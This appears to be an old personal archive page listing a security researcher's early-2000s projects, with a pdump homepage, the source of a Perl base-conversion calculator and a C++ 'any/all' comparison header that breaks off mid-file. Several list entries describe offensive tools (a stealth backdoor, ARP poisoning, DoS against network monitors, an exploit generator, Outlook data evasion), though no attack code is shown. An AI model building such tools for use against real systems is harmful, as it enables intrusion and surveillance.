OLD PROJECTS-CODE FROM LONG AGO

Old Projects: code from long ago


sql++
Full details at http://samy.pl/sql++/
an easily configurable, feature-rich, portable command-line SQL tool (works with mysql, oracle, pgsql, mssql!, and more)
posted on december 20, 2000
pdump
Full details at http://samy.pl/pdump/
advanced packet sniffer/injector with the features of all sorts of programs from tcpdump to ngrep to dsniff
posted on december 20, 2000
3.pl
Full details at http://samy.pl/3.pl
a calculator with userland namespace, list operations and advanced base conversion (ascii/bin/dec/hex/oct/dotted dec|hex|oct/bcd/packed bcd/etc)
posted on december 20, 2000
superpositions.h
Full details at http://samy.pl/superpositions.h
C++ header I wrote for 'quantum superpositions'. this allows a layered data type for easy arithmetic comparisons. for example, when you include the header in your programs, you can now compare an array or list of numbers or chars to something else. good examples and description is in the header file, check it out! examples:
posted on december 20, 2000
tracertspoof.pl
Full details at http://samy.pl/tracertspoof.pl
this is just a proof of concept I wanted to make which spoofs routes when someone traceroutes you. that means if someone traceroutes your host and you're running this program with any ips, the user tracerouting you will see those ips as routes before they see your ip as the last hop
posted on december 20, 2000
killmon.pl
Full details at http://samy.pl/killmon.pl
this program attempts to kill all sniffers/network monitors/IDSs on your local network or a remote host by using different denial of service attacks on passive network monitors
posted on december 20, 2000
arpredir.pl
Full details at http://samy.pl/arpredir.pl
program I wrote (still beta) that uses Packet:: to arp poisen a switch, meaning...say you're on a switch and you can't sniff/inject into anyone elses connections, you can use this to actually make all machines on the network think you are that IP, then your box forwards those packets to the real machine via eth packets (you'd have to use ip forwarding for that) enabling you to sniff them up without even setting your eth device in promiscuous mode
posted on december 20, 2000
screamingCobra
Full details at http://samy.pl/scobra/
an advanced application for automated, remote CGI vulnerability discovery of CGIs with unknown code
posted on december 20, 2000
frontdoor.pl
Full details at http://samy.pl/frontdoor.pl
old program I worked on as a simple 'replacement' of telnetd, has some nice things such as pty opening so all the good ANSI stuff can pass through the socket and some other fun stuff
posted on december 20, 2000
inject.pl
Full details at http://samy.pl/inject.pl
program that uses Tk for a GUI, allows you to inject tcp/udp/icmp packets with a nice little interface
posted on december 20, 2000
console-inject.pl
Full details at http://samy.pl/console-inject.pl
same as above but for console
posted on december 20, 2000
ping.pl
Full details at http://samy.pl/ping.pl
this program is neat since it allows you to ping a host through multiple protocols such as ICMP, tcp, etc...but it doesn't always use the actual ICMP header all the time, it will use different methods to see if a host is up for systems that block off icmp requests
posted on december 20, 2000
raw-ident.pl
Full details at http://samy.pl/raw-ident.pl
an identd daemon that controls it's connection raw, not using functions such as socket(), send()/recv(), etc. as an example 'base' for other raw daemons
posted on december 20, 2000
pdoor
Full details at http://samy.pl/pdoor/
an old 'backdoor' I made that doesn't open any ports and allows you to run programs remotely with a client that spoofs the source of the host and portscans will never find the backdoor since it only looks for certain types of packets and needs no 3way handshakes
posted on december 20, 2000
mp3-stream.pl
Full details at http://samy.pl/mp3-stream.pl
this is a program that allows you to switch between using your microphone and playing random mp3s on a live mp3 server for anyone to connect to. you can have something like a small radio show, have people listen to music then switch over to microphone and talk about music and then play some more music when everyone starts disconnecting :)
posted on december 20, 2000
rc4.pl
Full details at http://samy.pl/rc4.pl
RC4 encryption in 146 bytes of code
posted on december 20, 2000
passtc.pl
Full details at http://samy.pl/passtc.pl
1st place winner in the toorcon password challenge. the challenge was to create an algorithm/program that generates passwords for users that are easy to remember for them but difficult to crack/brute force for others
posted on december 20, 2000
crypt.pl
Full details at http://samy.pl/crypt.pl
2 functions to addon to programs, an encryption function and checking of a plain text password and encrypted password to see if they match
posted on december 20, 2000
cp5qrpff-fast.pl
Full details at http://samy.pl/cp5qrpff-fast.pl
my version of the original 531-byte qrpff-fast (DeCSS descrambling code). i was able to cut it down to 504-bytes using the same algorithm so no speed cuts of any sort
posted on december 20, 2000
cp5qrpff.pl
Full details at http://samy.pl/cp5qrpff.pl
my version of the original 526-byte qrpff (DeCSS descrambling code). i was able to cut it down to 500-bytes using the same algorithm so no speed cuts of any sort
posted on december 20, 2000
enigma.pl
Full details at http://samy.pl/enigma.pl
an enigma 3 rotor simulation program...takes you back, doesn't it?
posted on december 20, 2000
vnchown.exe
Full details at http://samy.pl/vnchown.exe
stand alone win32 executable for adding https support to a VNC+http server
posted on december 20, 2000
clear.txt
Full details at http://samy.pl/clear.txt
converting perl code to 'nothing' and executing it from 'nothing'
posted on december 20, 2000
DCCp5bot
Full details at http://samy.pl/dccp5bot.pl
this is an automated IRC bot from a few years back, it connects to an IRC server, joins a channel and automatically queues up specific files within DCC Fservs. has resume support and automates the downloading of files as quickly as possible from multiple sources
posted on december 20, 2000
mp3get.pl
Full details at http://samy.pl/mp3get.pl
recursively scans Apache dir structures looking for MP3s and downloads them (doesn't go below specified directory unlike other programs) Win32 binary>
posted on december 20, 2000
crawl5b.pl
Full details at http://samy.pl/crawl5b.pl
this is a program I made for Caezar's Challenge, 5B at DefCon 9. it recursively scans all pages it can find on a specified host and attempts to find CGI holes remotely and gives you an example CGI exploit for everyone it finds (see screamingCobra)
posted on december 20, 2000
c2p.pl
Full details at http://samy.pl/c2p.pl
a replacement of perl's h2ph (C header to perl header), this does stuff like convert structs to hashes, create the %SIZEOF hash for the size in bytes of actual structs, and other stuff. to be used with Packet::
posted on december 20, 2000
hybbot.pl
Full details at http://samy.pl/hybbot.pl
an IRC operator and channel service I specifically wrote for SUIDnet, an IRC network which I run a big chunk of (irc.LucidX.com:6667 or with SSL at irc.LucidX.com:9999). I do actaully spend a lot of time with this occasionally so it has evolved
posted on december 20, 2000
greph.pl
Full details at http://samy.pl/greph.pl
program that takes a list of C/C++/header files and looks through all of them for a regexp but recursively, which can be neat. say you're looking for a certain function in a program, but it's not in that program, and it's not in any of the headers that program uses, it would have to be in one of the headers of one of the headers, or could even go further or further. greph.pl will look all through these and keep on looking recursively without repeating files
posted on december 20, 2000
mass.pl
Full details at http://samy.pl/mass.pl
this allows you to run one command on multiple files when that command only allows you to run it on one file. an example is tar, say you want to tar -xvf a few different tarballs, but tar only allows you to do one at a time. with mass.pl you can easily do something like ./mass.pl 'tar -xvf *.tar'
posted on december 20, 2000
mkmod.pl
Full details at http://samy.pl/mkmod.pl
this lets you take a normal perl program and easily convert it to a module, making the easy work easier :) good to use when you're doing this with a lot of programs and want something automated
posted on december 20, 2000
burn.pl
Full details at http://samy.pl/burn.pl
program that uses Tk as a GUI to interface with mkisofs and burncd to easily burn cds
posted on december 20, 2000
tkscan.pl
Full details at http://samy.pl/tkscan.pl
old and simple port scanner I made, first time I used Tk also
posted on december 20, 2000
Outsmart
Full details at http://samy.pl/outsmart.txt
code for local Microsoft Outlook contact database security evasion (has not been successfully done before) to gain remote access to protected contact data
posted on december 20, 2000
cracker patcher
Full details at http://samy.pl/crack/
this is actually an old application that I just dug up. it's useful for easily creating small, easily distributable cracks/patches for win32 binaries
posted on december 20, 2000
5balgo1.html
Full details at http://samy.pl/5balgo1.html
my algorithm for automatic bug/exploit discovery in CGIs for Caezar's Challenge (see screamingCobra)
posted on december 20, 2000
5balgo2.html
Full details at http://samy.pl/5balgo2.html
algorithm for automatic bug/exploit discovery in remote software for Caezar's Challenge
posted on december 20, 2000
bofgen
Full details at http://samy.pl/bofgen/
a buffer overflow exploit generation program I recently wrote to take in certain data and create an exploit for a buffer overflow of a local program. has some neat features. check it out
posted on december 20, 2000
5bhack
Full details at http://samy.pl/5bhack/
code for the algorithm on bug/exploit discovery in remote software for Caezar's Challenge
posted on december 20, 2000
testenvs.pl
Full details at http://samy.pl/testenvs.pl
this will take a binary program, find all of the environment variables, and fill them up with data to attempt to overflow it. it's good with use of `find / -perm -4000`. it will easily help you find some exploitable (through ENV variables) programs and it will also attempt to exploit the program with a basic arguement buffer overflow
posted on december 20, 2000
getenvs.pl
Full details at http://samy.pl/getenvs.pl
this is a nice version of v9's getenv program. this retrieves environment variables from a binary program when you don't have the source to it. this can be helpful with finding buffer overflows, especially :)
posted on december 20, 2000
infobot advisory
Full details at http://samy.pl/infobot.html
an old advisory concerning infobot, an IRC automated chat bot
posted on december 20, 2000
pijack
Full details at http://samy.pl/pijack/
very old and ugly program I wrote when I started getting into sockets, it takes over IRC DCC connections before they get fully established

pdump - a raw packet sniffer and injector


Welcome to http://pdump.org (or a mirror)! You can find information here reguarding pdump, downloads, and more. pdump is a raw packet sniffer and injector, written by Samy Kamkar. It has the features of many other programs such as tcpdump, dsniff, and ngrep. Check the manual page for more information!
________________________________________


News - December 26th, 2000


Finally released pdump 0.8! Added almost 600 new fingerprints for the -x option, much better password sniffing library along with new password sniffing plugs for the web, fixed a few bugs, added new protocol sniffing, added advancements to other protocols, and added new methods for decoding packets. Hopefully I'll get a mailing list up soon, too.
________________________________________


pdump's Manual


A manual page (in HTML format) on how to use pdump, what it does, all of it's options, and other information on pdump and packets. Also includes examples and other helpful information.


Download pdump


You can get all the downloads from here such as the stable version, development version, and even specific files out of a certain version.


Changes


You can see all the changes made with all of the versions of pdump here, including changes in the development version!


Development Directory


You can connect to the development directory of pdump to see what's new and even get files from the development version to add on to your version.


pdump, by Samy Kamkar [CommPort5@LucidX.com]
http://www.samy.pl/pdump/

#!/usr/bin/perl

my $debug = 0;
my $VERSION = "0.42";
#
# '3', by Samy Kamkar [cp5@LucidX.com]
# ver 0.42  - April 14, 2002 -
# TODO/changeLog is at http://code.lucidx.com/TODO.3
#
# thanks to cseg (Fred Souza) for his help
# and his own original idea which i borrowed:
# http://cseg.lucidx.com/projects/
#
# examples:
# > x = 3 ; y = (1 .. 3) ; z = (int(reverse(bd(110011))/10))
# > (z .. x) ** $_, [ y ]
# = [[1], [2], [3]],  [[1], [4], [9]],  [[1], [8], [27]]
#
# > x = 3
# > y = 1..3
# > x
# = 3
# > y
# = [1], [2], [3]
# > (1 .. x) ** $_, [ y ]
# = [[1], [2], [3]],  [[1], [4], [9]],  [[1], [8], [27]]
#
# > ((bd(1010)-5)
# ]> *3 - reverse(
# ]]> 51)
# ]> ^ 1)
# = 1
#
# shell$ 3 bd 10011
# 19
# shell$ 3 Dd 127.0.0.1
# 2130706433
# shell$ 3 aX abc
# \x61 \x62 \x63
#
# ooo - () ** * / % + - . << >> & | ^
#

my $baseconv = shift(@ARGV);
my @values = @ARGV;
my %namespace;

my %conv = (
	"b" => "bin", # binary
	"d" => "dec", # decimal
	"o" => "oct", # octal
	"h" => "hex", # hexadecimal
	"a" => "asc", # ascii
	"B" => "bcd", # BCD
	"P" => "pbc", # packed BCD
	"D" => "dot", # dotted-quad (decimal)
	"O" => "dto", # dotted-octal
	"H" => "dth", # dotted-hexadecimal
	"X" => "bbh", # byte-by-byte hexadecimal
	"Y" => "bbd", # byte-by-byte decimal
	"Z" => "bbo", # byte-by-byte octal
);
my $convs = join("", keys(%conv));

unless ($baseconv || $baseconv =~ /^calc/i) {
 my $alive = 1;
 my ($parens, $data) = (0, "");
 print ": Type `help` for help.\n\n";
 while ($alive) {
  print "]" x $parens;
  print "[" x ($parens * -1);
  print "> ";

  chomp($data .= <STDIN>);
  $parens = ($data =~ tr|(||) - ($data =~ tr|)||);
  if ($data =~ /^\s*(?:help|\?)\s*$/mi) {
   &help();
   $data = "";
  }
  elsif ($data =~ /^\s*(?:die|quit|exit)\s*$/mi) {
   $alive = 0; # die later in case we have unfinished business
  }
  elsif ($parens != 0) {
   next;
  }

  else {
   foreach (split(/;/, $data)) {
    my @data = &operate($_);
    if ($#data > 0) {
     print "= [", join("],  [", @data), "]\n";
    }
    elsif ($#data != -1) {
     print "= $data[0]\n";
    }
   }
   $data = "";
   $parens = 0;
  }
 }
 die "\n3 -- by Samy Kamkar [cp5\@LucidX.com]\n";
}

$baseconv =~ /^(.)(.)$/;
my ($first, $second) = ($conv{$1} . "2bin", "bin2" . $conv{$2});

foreach my $value (@values) {
 print &{$second}(&{$first}($value)) . "\n";
}
exit 0;

sub operate {
 my ($string) = @_;
 my (%intns, $ops, @ops, @return);
 my $origstr = $string;
 $string =~ s/\s*//g;
 $string =~ s/,\[([^\]]+)\]$//;
 $string = "($string)";
 if ($ops = $1) {
  while ($ops =~ /\@?\$?([a-zA-Z_]\w+|[a-zA-Z])\[([^\]]+)\]/) {
   my ($tmp1, $tmp2) = ($1, $2);
   $tmp2 =~ s/([^,]+)\.\.([^,]+)/join(",", $1..$2)/ge;
   $ops =~ s/\@?\$?(?:[a-zA-Z_]\w+|[a-zA-Z])\[[^\]]+\]/join(",", @{$namespace{$tmp1}}[split(\/,\/, $tmp2)])/e;
  }
  $ops =~ s/\@?\$?([a-zA-Z_]\w+|[a-zA-Z])/join(",", @{$namespace{$1}})/eg;
  $ops =~ s/([^,]+)\.\.([^,]+)/join(",", $1..$2)/ge;
  @ops = split(/,/, $ops);
 }
 push(@ops, 0) unless @ops;
 foreach my $op (@ops) {
  my $nstr = my $str = $string;
  $namespace{"_"} = $op;
  my (@ret, @iops);
  while ($str =~ /\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)\.\.\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)/g) {
   my ($tmp1, $tmp2) = ($1, $2);
   $tmp1 = $namespace{$tmp1} if $tmp1 =~ /^[a-zA-Z_]/;
   $tmp2 = $namespace{$tmp2} if $tmp2 =~ /^[a-zA-Z_]/;
   $str =~ s/\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)\.\.\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)/\$__/;
   push(@iops, $tmp1 .. $tmp2);
   $nstr = $str;
  }
  while ($str =~ /\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+),\@?\$?([a-zA-Z_]\w*|\d+|\d*\.\d+)/g) {
   my ($tmp1, $tmp2) = ($1, $2);
   $tmp1 = $namespace{$tmp1} if $tmp1 =~ /^[a-zA-Z_]/;
   $tmp2 = $namespace{$tmp2} if $tmp2 =~ /^[a-zA-Z_]/;
   $str =~ s/\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+),\@?\$?(?:[a-zA-Z_]\w*|\d+|\d*\.\d+)/\$__/;
   push(@iops, $tmp1, $tmp2);
   $nstr = $str;
  }

  # pretend parse tree starts here
  my (@nvals, $type);
  while ($str) {
   my ($ins, $dins);
   if ($str =~ s/^([a-zA-Z][a-zA-Z0-9]*)\(//) {
    if (length($1) == 2 || $1 eq "factorial") {
     $type = "VFunc";
    }
    else {
     $type = "Func";
    }
   }
   elsif ($str =~ s/^\$?\@?([a-zA-Z]\w*)([^\.=])/$2/) {
    my $tmp = $1;
    if (ref($namespace{$tmp}) eq "ARRAY") {
     push(@iops, @{$namespace{$tmp}});
     $type = "Var";
     $ins = "__";
    }
    else {
     $str = $namespace{$tmp} . $str;
     $dins = 1;
     $type = "Num";
    }
   }
   elsif ($str =~ s/^\$?\@?([_a-zA-Z]\w*)//) {
    $type = "Var";
   }
   elsif ($str =~ s/^((?:0*(?:2(?:[0-4]\d|5[0-5])|1?\d{1,2})\.){3}(?:2(?:[0-4]\d|5[0-5])|1?\d{1,2}))//x) {
    $type = "IP";
   }
   elsif ($str =~ s/^(\d*\.\d+|\d+)//) {
    $type = "Num";
   }
   elsif ($str =~ s/^([^\w()\@\$,\.\:"'=]+)//) {
    $type = "OpChr";
   }
   elsif ($str =~ s/^([(),])//) {
    $type = "Chr";
   }
   elsif ($str =~ s/^(\.=)//) {
    $type = "Append";
   }
   elsif ($str =~ s/^(=)//) {
    $type = "Assign";
   }
   elsif ($str =~ s/^("[^"]*")// || $str =~ s/^('[^']*')//) {
    $type = "Str";
   }
   else {
    return "error: bad input near: " . substr($str, 0, 5);
   }
   unless ($dins) {
    if ($ins) {
     push (@nvals, [$ins, $type]);
    }
    else {
     push (@nvals, [$1, $type]);
    }
   }
  }
  push(@iops, 0) unless @iops;
  # end of pretend parse tree

  foreach my $iop (@iops) {
   my @vals = map [@$_], @nvals;
   $namespace{'__'} = $iop;
   for (my $i = $#vals; $i >= 0; $i--) {
    my ($elem, $type) = @{$vals[$i]};
    print "$elem\t-> $type\n" if $debug;

    if ($type eq "Assign") {
     push(@{$namespace{"_assign"}}, "$vals[$i-1][0]") unless grep { '^$vals[$i-1][0]$' } @{$namespace{"_assign"}};
     @{$vals[$i]} = ("", "Empty");
     @{$vals[$i-1]} = ("", "Empty");
    }

    if ($type eq "Append") {
     push(@{$namespace{"_append"}}, "$vals[$i-1][0]") unless grep { '^$vals[$i-1][0]$' } @{$namespace{"_append"}};
     @{$vals[$i]} = ("", "Empty");
     @{$vals[$i-1]} = ("", "Empty");
    }

    if ($type eq "Var") {
     if (ref($namespace{$vals[$i][0]}) eq "ARRAY") {
      @{$vals[$i]} = push(@ret, @{$namespace{$vals[$i][0]}});
     }
     else {
      @{$vals[$i]} = ($namespace{$vals[$i][0]}, "Num");
     }
    }
    if ($elem eq "(" || $type eq "Func" || $type eq "VFunc") {
     my ($string, $func);
     my $tmp1 = $i;
     my $tmp2 = 0;
     do {
      if ($tmp2++ == 0) {
       $func = $vals[$tmp1][0];
      }
      else {
       $string .= $vals[$tmp1][0] if $vals[$tmp1][0];
      }
     } while ($vals[$tmp1++][0] ne ")");
     $tmp1--;
     @{$vals[$tmp1]} = ("", "Empty");
     chop($string);
     for ($i .. $tmp1) {
      @{$vals[$_]} = ("", "Empty");
     }
     $vals[$i][0] = eval($string);
     if ($type eq "VFunc") {
      if ($func =~ /^([a-z])([a-z])$/i) {
       $vals[$i][0] = &{'bin2' . $conv{$2}}(&{$conv{$1} . '2bin'}("$vals[$i][0]"));
      }
      elsif ($func eq "factorial") {
       my $tmp = 1;
       foreach (1 .. $vals[$i][0]) {
        $tmp *= $_;
       }
       $vals[$i][0] = $tmp;
      }
     }
     elsif ($type eq "Func") {
      $vals[$i][0] = eval("$func(\"$vals[$i][0]\")");
     }
    }
   }
   push(@ret, eval(join("", map { $$_[0] } @vals)));
  }
  push(@return, ("[" . join("], [", @ret) . "]"));
 }
 my $commas = 0;
 foreach (@return) {
  $commas += tr/,//;
 }
 unless ($commas) {
  foreach (@return) {
   s/^.//;
   s/.$//;
  }
 }
 if ($#{$namespace{"_assign"}} >= 0) {
  foreach my $asn (@{$namespace{"_assign"}}) {
   @{$namespace{$asn}} = ();
   my @tmp = @return;
   @return = ();
   foreach (@tmp) {
    s/^\[//;
    s/\]$//;
    if (@tmp > 1) {
     push(@{$namespace{$asn}}, split(/\], \[/));
    }
    elsif (/,/) {
     push(@{$namespace{$asn}}, split(/\], \[/));
    }
    else {
     $namespace{$asn} = $_;
    }
   }
  }
  @{$namespace{"_assign"}} = ();
  return ();
 }

 if ($#{$namespace{"_append"}} >= 0) {
  foreach my $asn (@{$namespace{"_append"}}) {
   my @tmp = @return;
   @return = ();
   foreach (@tmp) {
    s/^\[//;
    s/\]$//;
    push(@{$namespace{$asn}}, split(/\], \[/));
   }
  }
  @{$namespace{"_append"}} = ();
  return ();
 }

 else {
  return @return;
 }
}

sub bin2bin {
 my $val = shift;
 $val =~ s/^0*//;
 return $val;
}

sub bcd2bin {
 my $val = shift;
 $val =~ s/0000([01]{4})/&dec2bin(&bin2dec($1))/eg;
 $val =~ s/^0*//;
 return $val;
}

sub pbc2bin {
 my $val = shift;
 $val =~ s/([01]{4})/&bin2dec($1)/eg;
 $val = &dec2bin($val);
 $val =~ s/^0*//;
 return $val;
}

sub dec2bin {
 my $val = unpack("B*", pack("N", shift));
 $val =~ s/^0*//;
 return $val;
}

sub asc2bin {
 my $val = unpack("B*", shift);
# $val =~ s/^0*//;
 return $val;
}

sub hex2bin {
 my $val = shift;
 my @vals;
 push(@vals, hex($1)) while $val =~ s/(?:0x|\\x)?([A-F0-9]{1,2})//i;
 $val = join("", unpack("B*", pack("C*", @vals)));
 $val =~ s/^0*//;
 return $val;
}

sub bbh2bin {
 my $val = &hex2bin(shift);
 $val =~ s/^0*//;
 return $val;
}

sub bbo2bin {
 my $val = &oct2bin(shift);
 $val =~ s/^0*//;
 return $val;
}

sub bbd2bin {
 my $val = &dec2bin(shift);
 $val =~ s/^0*//;
 return $val;
}

sub oct2bin {
 my $val = shift;
 $val =~ s/^0// if length($val) > 1;
 $val = unpack("B*", pack("C*", oct($val)));
 $val =~ s/^0*//;
 return $val;
}

sub dot2bin {
 my $val = unpack("B36", pack("C4", split(/\./, shift)));
 $val =~ s/^0*//;
 return $val;
}

sub dto2bin {
 my $val = shift;
 $val =~ s/^0?(\d+)\.0?(\d+)\.0?(\d+)\.0?(\d+)$/&dot2bin("0$1.0$2.0$3.0$4")/e;
 $val =~ s/^0*//;
 return $val;
}

sub dth2bin {
 my $val = shift;
 $val =~ s/^(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)\.(?:\\x|0x)?(\d+)$/&dot2bin("0x$1.0x$2.0x$3.0x$4")/e;
 $val =~ s/^0*//;
 return $val;
}


sub bin2dec {
 my $val = shift;
 my ($result, $place) = (0, 0);
 while ($val =~ s/(.)$//) {
  $result += 2 ** $place++ * $1;
 }
 return $result;
}

sub bin2oct {
 return sprintf("0%o", &bin2dec(shift));
}

sub bin2hex {
 return sprintf("0x%x", &bin2dec(shift));
}

sub bin2bbh {
 return sprintf("\\x%x" x (length(&eight($_[0]))/8), unpack("C*", pack("B*", &eight(shift))));
}

sub bin2bbo {
 return sprintf("0%o " x (length(&eight($_[0]))/8), unpack("C*", pack("B*", &eight(shift))));
}

sub bin2bbd {
 return join(" ", unpack("C*", pack("B*", &eight(shift))));
}

sub bin2asc {
 return pack("B*", &eight(shift));
}

sub bin2dot {
 return join(".", unpack("C4", pack("B*", &eight(shift))));
}

sub bin2dto {
 return sprintf("0%o.0%o.0%o.0%o", unpack("C4", pack("B*", &eight(shift))));
}

sub bin2bcd {
 my $val = &bin2dec(shift);
 $val =~ s/(.)/"0000" . sprintf("%04i", &dec2bin($1))/eg;
 return $val;
}

sub bin2pbc {
 my $val = &bin2dec(shift);
 $val =~ s/(.)/sprintf("%04i", &dec2bin($1))/eg;
 return $val;
}

sub bin2dth {
 return sprintf("0x%x.0x%x.0x%x.0x%x", unpack("C4", pack("B*", &eight(shift))));
}

sub eight {
 my $val = shift;
 $val = "0" . $val while (length($val) % 8);
 return $val;
}

sub help {
 print
"
3 -- by Samy Kamkar [cp5\@LucidX.com]

see $0's code for examples

BASES:
b  => binary,           a => ASCII,
d  => decimal,          D => dotted quad,
o  => octal,            O => dotted octal,
h  => hexadecimal,      H => dotted hexadecimal,
B  => BCD,              P => packed BCD,
X  => byte-by-byte hexadecimal,
Y  => byte-by-byte decimal,
Z  => byte-by-byte octal,

CORE FUNCTIONS: exit, help

FUNCTIONS: base1base2(value), e.g.: dh(5), Dd(\"127.0.0.1\"), ah(\"abc\")
  also:    sin(), reverse(), abs(), atan2(), cos(), exp(), int(),
           sqrt(), log(), factorial()

OPERATORS: + - * / % ** ^ | & << >> ( )
            using a '(' at the beginning and leaving it open
            after hitting 'Enter' will allow you to neatly
            continue the equation on a new line(s) and you
            would end the equation and get the result after
            closing it with a )

";
#OTHER HELP TOPICS: namespace, commandline
#
#for more help on something, enter: help 'base/func/topic'
#e.g., help b (for help on binary),
#      help log (for help on log()),
#      help delete (for help on delete()),
#      help namespace (for help on the namespace topic),
#      help operators (for all operators), etc.
}


/*
 *  superpositions.h - nov. 3rd, 2001
 *  -samy
 *
 *  This allows you to use the implemented any()
 *  and all() functions with doubles, ints or chars
 *  to allow you to compare the superposition
 *  (simultaneous/layered data, for example, an array)
 *  with other superpositions or data using arithmetic
 *  comparison operators.
 *
 *  OPERATORS:
 *   ==, !=, >=, <=, >, <
 *  FUNCTIONS
 *   any(char_array);
 *   any(int num_of_elems, double_array);
 *   any(int num_of_elems, int_array);
 *   any(int num_of_elems, ...);
 *   // ... accepts chars, doubles and ints
 *   // all() functions are the same as the any()s
 *
 *
 *  examples:
 *   if (any(num_of_elems, 4, 5, 6) == 5) // num_of_elems should be 3
 *     // this is true because 5 is one of the elements
 *
 *
 *   if (all(char_array) != all(3, 'a', 'b', 'c'))
 *     // this is true if there are no 'a's,
 *     // 'b's, or 'c's in char_array
 *
 *
 *   int num_of_elems = 2; // passing 2 elements
 *   double y[3] = {6.0, 7.0, 8.0};
 *   if (any(num_of_elems, 5, 6) == any(3, y))
 *     // true since the 6's are passed in both functions
 *
 *   etc...
 */

#ifndef QUANTUM_H_
#define QUANTUM_H_

#include <stdarg.h>
#include <vector>
#include <iostream.h>

using namespace std;

class Quantum
{
public:
	Quantum();

	vector<double> data;
	bool type; // true == any, false == all

	bool operator==(double);
	bool operator!=(double);
	bool operator< (double);
	bool operator> (double);
	bool operator<=(double);
	bool operator>=(double);

	bool operator==(Quantum);
	bool operator!=(Quantum);
	bool operator< (Quantum);
	bool operator> (Quantum);
	bool operator<=(Quantum);
	bool operator>=(Quantum);
};

Quantum::Quantum()
{
	type = true;
}

Quantum any(char array[]);
Quantum any(int numArgs, double array[]);
Quantum any(int numArgs, int array[]);
Quantum any(int numArgs, double first, ...);
Quantum any(int numArgs, int first, ...);
Quantum any(int numArgs, char first, ...);

Quantum all(char array[]);
Quantum all(int numArgs, double array[]);
Quantum all(int numArgs, int array[]);
Quantum all(int numArgs, double first, ...);
Quantum all(int numArgs, int first, ...);
Quantum all(int numArgs, char first, ...);

// BEGINNING OF SUPERPOSITIONING FUNCTIONS

// any() functions
Quantum any(int numArgs, double array[])
{
	Quantum temp;
	temp.type = true;
	for (int i = 0; i < numArgs; i++)
		temp.data.push_back(array[i]);
	return temp;
}

Quantum any(int numArgs, int array[])
{
	Quantum temp;
	temp.type = true;
	for (int i = 0; i < numArgs; i++)
		temp.data.push_back(double(array[i]));
	return temp;
}

Quantum any(char array[])
{
	Quantum temp;
	temp.type = true;
	int i = 0;
	for (i = 0; array[i] != '\0'; i++)
		temp.data.push_back(double(array[i]));
	array[i] = 0;
	return temp;
}

Quantum any(int numArgs, double first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = true;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, double));
	va_end(ap);
	return temp;
}

Quantum any(int numArgs, int first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = true;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, int));
	va_end(ap);
	return temp;
}

Quantum any(int numArgs, char first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = true;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, char));
	va_end(ap);
	return temp;
}

// all() functions
Quantum all(int numArgs, double array[])
{
	Quantum temp;
	temp.type = false;
	for (int i = 0; i < numArgs; i++)
		temp.data.push_back(array[i]);
	return temp;
}

Quantum all(int numArgs, int array[])
{
	Quantum temp;
	temp.type = false;
	for (int i = 0; i < numArgs; i++)
		temp.data.push_back(double(array[i]));
	return temp;
}

Quantum all(char array[])
{
	Quantum temp;
	temp.type = false;
	int i = 0;
	for (i = 0; array[i] != '\0'; i++)
		temp.data.push_back(double(array[i]));
	array[i] = 0;
	return temp;
}

Quantum all(int numArgs, double first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = false;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, double));
	va_end(ap);
	return temp;
}

Quantum all(int numArgs, int first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = false;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, int));
	va_end(ap);
	return temp;
}

Quantum all(int numArgs, char first, ...)
{
	va_list ap;
	va_start(ap, first);
	Quantum temp;
	temp.type = false;
	temp.data.push_back(first);
	for (int i = 1; i < numArgs; i++)
		temp.data.push_back(va_arg(ap, char));
	va_end(ap);
	return temp;
}

// END OF SUPERPOSITIONING FUNCTIONS

// BEGINNING OF OVERLOADED OPERATORS (Quantum ? Double)

bool Quantum::operator==(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] == x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] != x)
				return false;
		return true;
	}

	return false;
}

bool Quantum::operator!=(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] != x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] == x)
				return false;
		return true;
	}

	return false;
}

bool Quantum::operator>=(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] >= x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] < x)
				return false;
		return true;
	}

	return false;
}

bool Quantum::operator<=(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] <= x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] > x)
				return false;
		return true;
	}

	return false;
}

bool Quantum::operator>(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] > x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] <= x)
				return false;
		return true;
	}

	return false;
}

bool Quantum::operator<(double x)
{
	register int i = 0;

	// any()
	if (type == true)
	{
		for (; i < data.size(); i++)
			if (data[i] < x)
				return true;
		return false;
	}

	// all()
	else
	{
		for (; i < data.size(); i++)
			if (data[i] >= x)
				return false;
		return true;
	}

	return false;
}

// END OF OVERLOADED OPERATORS (Quantum ? Double)

// BEGINNING OF OVERLOADED OPERATORS (Quantum ? Quantum)

